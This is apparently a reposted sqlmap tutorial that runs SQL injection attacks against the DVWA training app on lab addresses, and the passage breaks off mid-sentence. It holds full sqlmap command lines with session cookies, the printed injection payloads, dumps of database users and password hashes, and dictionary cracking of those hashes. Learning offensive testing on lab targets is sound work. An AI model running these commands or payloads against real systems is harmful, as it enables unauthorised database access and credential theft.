sql injection – sqlmap

本文介绍如何使用SQLMap这一开源渗透测试工具,自动化检测并利用SQL注入漏洞接管数据库服务器。涵盖获取数据库版本、名称、表名及列名等操作,并演示了如何通过SQLMap抓取cookie、查找用户及密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

backtrack 5r1

/pentest/database/sqlmap

To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To Find SQL database Name
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --column -T table-name -D database-name

To see the data from database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --column -T table-name -D database-name

grab cookie from tamperdata firefox plugin

root@bt:/pentest/database/sqlmap#./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using ‘/pentest/database/sqlmap/output/IP-Address/session’ as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 8761=8761 AND ‘FczA’=’FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘COXA’=’COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1′ UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND ‘kmcR’=’kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1′ AND SLEEP(5) AND ‘qxrK’=’qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file ‘/pentest/database/sqlmap/output/IP-Address/session’: information_schema, cdcol,  mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/IP-Address’

./sqlmap.py -u ‘http://IP-Address/?id=1&Submit=Submit#’ –cookie=’PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low’ –string=”Surname”  –users –password

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

————————————————————–
updates
————————————————————–
Find database

Used tamperdata firefox plugin to get Cookie as bellow

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

reload the login page so get clean url /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

————————————————————–
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

————————————————————–

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note you can use online decrypter sites

MySQL4.1 uses sha1

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

Here is a list of major features implemented in sqlmap: * Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase; * Extensive database management system back-end fingerprint based upon: o Inband DBMS error messages o DBMS banner parsing o DBMS functions output comparison o DBMS specific features such as MySQL comment injection o Passive SQL injection fuzzing * It fully supports two SQL injection techniques: o Blind SQL injection, also known as Inference SQL injection o Inband SQL injection, also known as UNION query SQL injection and it partially supports error based SQL injection as one of the vectors for database management system fingerprint; * It automatically tests all provided GET, POST, Cookie and User- Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three type with one and two brackets to find which is the valid syntax to perform further injections with; * It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, being them GET, POST, Cookie parameters; * SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end; * It recognizes valid queries by false ones based upon HTML output page hashes comparison by default, but it is also possible to choose to perform such test based upon string matching; * HTTP requests can be performed in both HTTP method GET and POST (default: GET); * It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file; * It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data; * It is possible to provide an anonymous HTTP proxy address and port to pass by the HTTP requests to the target URL; * It is possible to provide the remote DBMS back-end if you already know it making sqlmap save some time to fingerprint it; * It supports various command line options to get database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated; * It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION 